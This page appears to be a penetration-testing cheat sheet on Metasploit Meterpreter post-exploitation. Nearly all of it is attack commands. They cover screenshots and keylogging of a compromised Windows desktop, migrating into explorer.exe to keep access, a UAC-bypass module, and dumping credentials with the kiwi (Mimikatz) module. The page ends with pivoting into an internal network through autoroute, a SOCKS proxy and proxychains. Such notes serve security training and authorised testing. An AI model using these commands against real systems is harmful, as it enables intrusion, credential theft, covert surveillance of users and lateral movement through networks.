Post Exploitation
Core Features
Take a screenshot of the compromised desktop:
meterpreter > screenshot
Start a keylogger:
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Migrating Processes
When we compromise a host, our Meterpreter payload is executed inside the process of the application we attack. If the victim closes that process, our access to the machine is closed as well.
Using migrate
command, we can move the execution of our Meterpreter to different processes. To do this, we first run ps
to view all running processes and then pick one, like explorer.exe
, and issue the migrate
command:
meterpreter > ps
meterpreter > migrate <explorer.exe_id>
Or, we can set an autorun script before running the module:
msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
Modules
Bypass UAC:
msf6 > use exploit/windows/local/bypassuac_injection_winsxs
PowerShell:
meterpreter > load powershell
meterpreter > powershell_execute "$PSVersionTable.PSVersion"
Mimikatz:
meterpreter > load kiwi
meterpreter > getsystem
meterpreter > creds_msv
Pivoting
Enumerate network interfaces:
C:\Windows\system32>ipconfig
Found two nework interfaces:

We are on 192.168.214.10 and we want to pivot to 172.16.214.10. Use autoroute:
msf6 > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
msf6 post(multi/manage/autoroute) > run
Use auxiliary/server/socks_proxy
to configure a SOCKS proxy:
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
Configure proxychains at /etc/proxychains4.conf
:

Now we can run commands with proxychains
as prefix to pivot. For example:
proxychains rdesktop 172.16.214.5
Last updated
Was this helpful?